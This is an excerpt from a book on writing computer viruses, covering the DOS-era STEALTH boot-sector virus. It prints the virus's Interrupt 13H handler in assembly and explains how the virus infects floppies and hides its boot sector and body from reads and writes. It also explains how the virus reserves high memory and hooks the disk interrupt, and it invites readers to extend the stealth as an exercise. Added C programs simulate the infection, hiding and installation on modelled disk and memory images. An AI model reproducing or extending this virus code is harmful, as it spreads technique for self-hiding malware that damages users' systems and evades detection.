
The Anti-Detection Mechanism

From the document The Little Black Book of Computer Viruses (pages 98-102)

Code for this type of interrupt trap looks like this:

INT_13H:
        sti                     ;interrupts on
        cmp     ah,2            ;we want to intercept reads
        jnz     I13R            ;pass anything else to BIOS
        cmp     dh,0            ;is it head 0?
        jnz     I13R            ;nope, let BIOS handle it
        cmp     ch,0            ;is it track 0?
        jnz     I13R            ;nope, let BIOS handle it
RF0:    cmp     dl,80H          ;is it the hard disk?
        jnc     I13R            ;yes, let BIOS handle read
        cmp     cl,1            ;no, floppy, is it sector 1?
        jnz     I13R            ;no, let BIOS handle it
        call    CHECK_DISK      ;is floppy already infected?
        jz      I13R            ;yes so let BIOS handle it
        call    INFECT_FLOPPY   ;else go infect the diskette
                                ;and then let BIOS go
                                ;do the original read
I13R:   jmp     DWORD PTR cs:[OLD_13H]  ;BIOS Int handler

where OLD_13H is the data location where the original Interrupt 13H vector is stored before it is replaced with a vector to INT_13H.

CHECK_DISK simply calls GET_BOOT_SEC and IS_VBS after saving all the registers (to pass them to the BIOS later to do the originally requested read).

Since the virus is already intercepting Interrupt 13H to infect disks, it is not too difficult to add a little functionality to the viral interrupt handler to hide certain sectors from prying eyes. For example, consider an attempt to read the boot sector on a 1.2 megabyte diskette: STEALTH traps the request to read. Instead of just blindly servicing it, the virus first reads the boot sector into its own buffer. There, it checks to see if this sector is the viral boot sector. If not, it allows the caller to read the real boot sector. On the other hand, if the real boot sector belongs to STEALTH, it will read the old boot sector from Track 79, Head 1, Sector 15, and pass that to the caller instead of the viral boot sector. In this way, the viral boot sector will be invisible to any program that uses either DOS or BIOS to read the disk (and the exceptions to that are pretty rare), provided the virus is in memory. In the same way, the BIOS write function can be redirected to keep away from the viral boot sector, redirecting any attempts to write there to the old sector.

[Figure 16: Viral Read Logic. Flowchart of an intercepted BIOS read-sector request. Decisions: Head 0? Track 0? Sector 1? Hard Disk? For a boot sector read: Read Boot Sec, Is Disk Infected? (if not, Infect Disk), then Read Old Boot Sector from Hidden Area on disk and Move Old Boot Sector to es:bx specified by caller. On the hard disk: Sec 2-7? Move dummy data to es:bx. Anything else: Pass Control to ROM BIOS. All paths end in Return to calling routine.]

In addition to hiding the boot sector, one can hide the rest of the virus from any attempts to access it through Interrupt 13H.

On hard drives, STEALTH does not allow one to read or write sectors 2 through 7 on Track 0, Head 0, because the virus code is stored there. It fools a program attempting a read by returning a data block of zeros. It fools a program trying to write those sectors by returning as if it had written them, when in fact the write was bypassed.

Additionally, any attempt to read or write the sectors on the floppy drive that hold the virus could be trapped and returned with an error (carry flag set). That is what one would expect if the clusters marked as bad in the FAT really were bad. STEALTH does not go that far, though, since DOS protects those sectors pretty well already. You may want to incorporate that extension as an exercise.

With these anti-detection procedures in place, the main body of the virus is well hidden, and when any program looks at the boot sector, it sees the old boot sector. The only ways to detect the virus on a disk are (a) to write a program to access the disk with the hardware directly, or (b) to boot from an uninfected disk and examine the boot sector of the potentially infected disk. Of course, the virus is not very well hidden in memory.
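The read and write redirection described above, as an added model in C that is not code from the book: it plays the viral Int 13H handler against an in-memory disk image so the hiding can be checked end to end. The geometry (80 tracks, 2 heads, 15 sectors, reused for the hard disk too), the marker string that stands in for IS_VBS, the sector contents, and the choice to serve the old boot sector right after infecting are all assumptions of the model; the hidden-area location (Track 79, Head 1, Sector 15) and the hard disk sectors 2-7 behaviour are taken from the text. The hard disk's own boot sector is not redirected here because the page does not say where its old boot sector is kept.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECTOR_SIZE 512
#define TRACKS 80
#define HEADS  2
#define SPT    15   /* 1.2 MB floppy geometry (assumed for the hard disk model as well) */

typedef struct {
    uint8_t dl;                                   /* BIOS drive number: 00H floppy, 80H first hard disk */
    uint8_t data[TRACKS * HEADS * SPT * SECTOR_SIZE];
} Disk;

/* Assumed marker that IS_VBS would look for; the real signature is not on the page. */
static const char VBS_MARK[] = "VBS-MODEL";

/* BIOS CHS numbering: tracks and heads count from 0, sectors from 1. */
static uint8_t *sector_ptr(Disk *d, int track, int head, int sector) {
    return d->data + (((size_t)track * HEADS + head) * SPT + (sector - 1)) * SECTOR_SIZE;
}

/* The ROM BIOS read and write that the virus chains to through OLD_13H. */
static void bios_read(Disk *d, int t, int h, int s, uint8_t *buf) { memcpy(buf, sector_ptr(d, t, h, s), SECTOR_SIZE); }
static void bios_write(Disk *d, int t, int h, int s, const uint8_t *buf) { memcpy(sector_ptr(d, t, h, s), buf, SECTOR_SIZE); }

static bool is_vbs(const uint8_t *sec) { return memcmp(sec + 3, VBS_MARK, sizeof VBS_MARK) == 0; }

/* INFECT_FLOPPY: park the old boot sector at track 79, head 1, sector 15 (the hidden
   area named on the page) and write the marked viral boot sector into sector 1. */
static void infect_floppy(Disk *d) {
    uint8_t old[SECTOR_SIZE], vbs[SECTOR_SIZE] = {0};
    bios_read(d, 0, 0, 1, old);
    bios_write(d, 79, 1, 15, old);
    memcpy(vbs + 3, VBS_MARK, sizeof VBS_MARK);
    bios_write(d, 0, 0, 1, vbs);
}

/* Viral Int 13H handler for AH=2 (read) and AH=3 (write) of one sector.
   Returns the carry flag the caller sees; false means success. */
bool stealth_int13(Disk *d, uint8_t ah, int track, int head, int sector, uint8_t *buf) {
    bool is_floppy = d->dl < 0x80;
    if (track == 0 && head == 0) {
        if (!is_floppy && sector >= 2 && sector <= 7) {  /* hard disk: the virus body lives here */
            if (ah == 2) memset(buf, 0, SECTOR_SIZE);     /* read: hand back a block of zeros */
            return false;                                 /* write: report success, do nothing */
        }
        if (is_floppy && sector == 1) {
            uint8_t real[SECTOR_SIZE];
            bios_read(d, 0, 0, 1, real);                 /* GET_BOOT_SEC into the virus's own buffer */
            bool infected = is_vbs(real);
            if (ah == 2 && !infected) { infect_floppy(d); infected = true; }
            if (infected) {                               /* caller gets the old boot sector instead */
                if (ah == 2) bios_read(d, 79, 1, 15, buf);
                else         bios_write(d, 79, 1, 15, buf);
                return false;
            }
        }
    }
    if (ah == 2) bios_read(d, track, head, sector, buf);  /* everything else: original BIOS */
    else         bios_write(d, track, head, sector, buf);
    return false;
}

static Disk fd_img, hd_img;   /* static: each constructed image is 1.2 MB */

/* Constructed scenario: an uninfected floppy read through the resident virus. True when the
   caller only ever sees the original boot sector while a raw read shows the viral one. */
bool floppy_stealth_holds(void) {
    uint8_t seen[SECTOR_SIZE], raw[SECTOR_SIZE], upd[SECTOR_SIZE];
    memset(&fd_img, 0, sizeof fd_img);
    fd_img.dl = 0x00;
    memset(sector_ptr(&fd_img, 0, 0, 1), 0x5A, SECTOR_SIZE);  /* constructed "old" boot sector */

    stealth_int13(&fd_img, 2, 0, 0, 1, seen);    /* first read infects, then hides */
    bios_read(&fd_img, 0, 0, 1, raw);            /* what a boot from a clean disk would see */
    bool hidden = seen[0] == 0x5A && is_vbs(raw) && !is_vbs(seen);

    memset(upd, 0xC3, SECTOR_SIZE);
    stealth_int13(&fd_img, 3, 0, 0, 1, upd);     /* "write the boot sector" */
    bios_read(&fd_img, 0, 0, 1, raw);
    stealth_int13(&fd_img, 2, 0, 0, 1, seen);
    bool write_redirected = is_vbs(raw) && seen[0] == 0xC3 && sector_ptr(&fd_img, 79, 1, 15)[0] == 0xC3;
    return hidden && write_redirected;
}

/* Constructed scenario: hard disk with the virus body in track 0, head 0, sectors 2-7. */
bool hard_disk_stealth_holds(void) {
    uint8_t buf[SECTOR_SIZE];
    memset(&hd_img, 0, sizeof hd_img);
    hd_img.dl = 0x80;
    for (int s = 2; s <= 7; s++) memset(sector_ptr(&hd_img, 0, 0, s), 0xEB, SECTOR_SIZE);
    memset(sector_ptr(&hd_img, 0, 0, 8), 0x11, SECTOR_SIZE);    /* ordinary data next door */

    stealth_int13(&hd_img, 2, 0, 0, 4, buf);
    bool reads_zero = buf[0] == 0 && buf[SECTOR_SIZE - 1] == 0;
    memset(buf, 0xFF, SECTOR_SIZE);
    bool write_ok = !stealth_int13(&hd_img, 3, 0, 0, 4, buf);      /* reported as success */
    bool write_bypassed = sector_ptr(&hd_img, 0, 0, 4)[0] == 0xEB;   /* but nothing changed */
    stealth_int13(&hd_img, 2, 0, 0, 8, buf);                         /* sector 8 passes through */
    return reads_zero && write_ok && write_bypassed && buf[0] == 0x11;
}

int main(void) {
    printf("floppy boot sector hidden, writes redirected: %s\n", floppy_stealth_holds() ? "yes" : "no");
    printf("hard disk sectors 2-7 hidden: %s\n", hard_disk_stealth_holds() ? "yes" : "no");
    return 0;
}
```

The two scenario functions are the page's detection method (b) in miniature: `bios_read` is what a program sees after booting from a clean disk, `stealth_int13` is what it sees with the virus resident, and the two disagree on exactly the sectors the text says are hidden.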

Installing the Virus in Memory

Before the virus passes control to the original boot sector, which will load DOS, it must set itself up in memory somewhere where it won't get touched. To do this outside of the control of DOS is a bit tricky. The basic idea is that DOS uses a number stored at 0040:0013 Hex, which contains the size of available memory in kilobytes. This number is set up by the BIOS before it reads the boot sector. It may have a value ranging up to 640 = 280H. When the BIOS sets this parameter up, it looks to see how much memory is actually installed in the computer, and reports it here. However, something could come along before DOS loads and change this number to a smaller value. In such a situation, DOS will not use all the memory that is available in the system, but only what it's told to use by this memory size variable. Memory above that point will be reserved, and DOS won't touch it.

The strategy for loading STEALTH into memory is to put it in the highest physical memory available, determined by the memory size, as the BIOS has set it. Then STEALTH subtracts a sufficient number of kilobytes from the memory size variable to protect itself. In this way, that memory will be kept away from DOS, and used by STEALTH when Interrupt 13H is called.

The two responsibilities of the viral boot sector are to load the main body of the virus into memory, and then to load and execute the original boot sector. When the BIOS loads the viral boot sector (and it loads whatever is placed at Track 0, Head 0, Sector 1), that sector first moves itself into the highest 512 bytes of memory (within the 640 kilobyte limit). In a machine with 640K of memory, the first unoccupied byte of memory is at A000:0000.

[Figure 17: The Virus in RAM. Three panels: (A) the viral boot sector moves itself from 0000:7C00 to high memory, just below A000:0000. (B) The viral boot sector loads the rest of the virus and the old boot sector at 9820:7000. (C) The viral boot sector installs Int 13H, changing the vector at 0000:004C from F000:2769 to the virus in the 9820H segment (shown as 9820:0054), and moves the old boot sector to 0000:7C00 to execute.]

The boot sector will move itself to the first 512 bytes just below this. Since that sector was assembled with an offset of 7C00 Hex, it must relocate to 9820:7C00 Hex, which is linear address 9FE00H, so that the sector ends right at A000:0000, as desired. Next, the viral boot sector reads the 6 sector long main body of the virus into memory just below this, from 9820:7000 to 9820:7BFF. The original boot sector occupies 9820:7A00 to 9820:7BFF, since it is the sixth of the six sectors loaded.

The viral boot sector then subtracts 4 from the memory-size word at 0040:0013H to reserve 4 kilobytes of memory for the virus (the seven sectors loaded occupy 3.5 kilobytes). Next, the viral boot sector reroutes Interrupt 13H to the virus, saving the original vector in OLD_13H. Finally, it moves the original boot sector from 9820:7A00 to 0000:7C00 and executes it.

The original boot sector proceeds to load DOS and get the computer up and running, oblivious to the fact that the system is infected.
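The installation steps above, worked through as an added C model that is not the book's code: it derives the relocation segment from the BIOS memory-size word, performs the 4 kilobyte reservation and the vector swap on a model of low memory, and checks that the reservation really covers the seven sectors. The `LowMem` and `Layout` structures, the handler offset inside the body (the page's figure only shows the new vector pointing into the 9820H segment), and the `int13_looks_hooked` heuristic are assumptions; the figures 640 = 280H, 9820:7000, 9820:7A00, 9820:7C00 and F000:2769 come from the text and Figure 17. The model also generalizes to other memory sizes, which the page does not do.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed model of the low-memory locations the loader touches (not the book's code). */
typedef struct {
    uint16_t mem_kb;       /* word at 0040:0013: usable memory in KB, as the BIOS set it */
    uint16_t int13_off;    /* 0000:004C: Int 13H vector offset */
    uint16_t int13_seg;    /* 0000:004E: Int 13H vector segment */
} LowMem;

typedef struct {
    uint16_t seg;          /* segment the virus relocates into (9820H on a 640K machine) */
    uint32_t boot_linear;  /* relocated viral boot sector, seg:7C00 */
    uint32_t body_linear;  /* start of the 6-sector main body, seg:7000 */
    uint32_t old_bs_linear;/* saved original boot sector, seg:7A00 */
} Layout;

#define SECTOR      512u
#define BOOT_OFF    0x7C00u   /* the boot sector is assembled for offset 7C00H */
#define BODY_OFF    0x7000u
#define RESERVE_KB  4u
#define HANDLER_OFF 0x7054u   /* assumed offset of INT_13H inside the loaded body */

static uint32_t linear(uint16_t seg, uint16_t off) { return ((uint32_t)seg << 4) + off; }

/* Pick the segment so that a sector assembled for 7C00H ends exactly at the top of
   memory the BIOS reported; the body and the old boot sector then fall just below it. */
Layout plan_layout(uint16_t mem_kb) {
    uint32_t top = (uint32_t)mem_kb * 1024u;          /* first byte above usable RAM */
    Layout l;
    l.seg = (uint16_t)((top - SECTOR - BOOT_OFF) >> 4);
    l.boot_linear = linear(l.seg, BOOT_OFF);
    l.body_linear = linear(l.seg, BODY_OFF);
    l.old_bs_linear = linear(l.seg, BODY_OFF + 5u * SECTOR); /* sixth of the six sectors loaded */
    return l;
}

/* The steps the page describes: relocate, shrink the BIOS memory-size word by 4 KB so
   DOS never allocates the top, and point Int 13H at the resident handler. */
Layout install(LowMem *lm) {
    Layout l = plan_layout(lm->mem_kb);
    lm->mem_kb -= RESERVE_KB;        /* the old vector would be saved in OLD_13H before this */
    lm->int13_seg = l.seg;
    lm->int13_off = HANDLER_OFF;
    return l;
}

/* Does the reserved 4 KB actually cover the seven sectors loaded? */
bool reservation_covers(const LowMem *lm, const Layout *l) {
    uint32_t dos_top = (uint32_t)lm->mem_kb * 1024u;
    return l->body_linear >= dos_top && l->boot_linear + SECTOR <= dos_top + RESERVE_KB * 1024u;
}

/* Memory-side check, an assumed heuristic illustrating "not very well hidden in memory":
   the disk vector points into RAM above the DOS memory top instead of into ROM at F000H. */
bool int13_looks_hooked(const LowMem *lm) {
    uint32_t dos_top = (uint32_t)lm->mem_kb * 1024u;
    return lm->int13_seg < 0xF000 && linear(lm->int13_seg, lm->int13_off) >= dos_top;
}

/* Constructed walk-through of a 640K machine whose BIOS vector is F000:2769 as in Figure 17. */
bool install_demo(void) {
    LowMem lm = { 640, 0x2769, 0xF000 };
    bool clean_before = !int13_looks_hooked(&lm);
    Layout l = install(&lm);
    return clean_before && lm.mem_kb == 636 && l.seg == 0x9820
        && reservation_covers(&lm, &l) && int13_looks_hooked(&lm);
}

int main(void) {
    Layout l = plan_layout(640);
    printf("segment %04X: body at %05X, old BS at %05X, viral BS at %05X\n",
           (unsigned)l.seg, (unsigned)l.body_linear, (unsigned)l.old_bs_linear, (unsigned)l.boot_linear);
    printf("install on a 640K machine consistent: %s\n", install_demo() ? "yes" : "no");
    return 0;
}
```

For 640K the plan reproduces the page's numbers (segment 9820H, body at 9F200H, old boot sector at 9FC00H, viral boot sector at 9FE00H); a 512K machine would give segment 7820H by the same arithmetic, which is why the loader reads the memory-size word instead of hardcoding an address.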
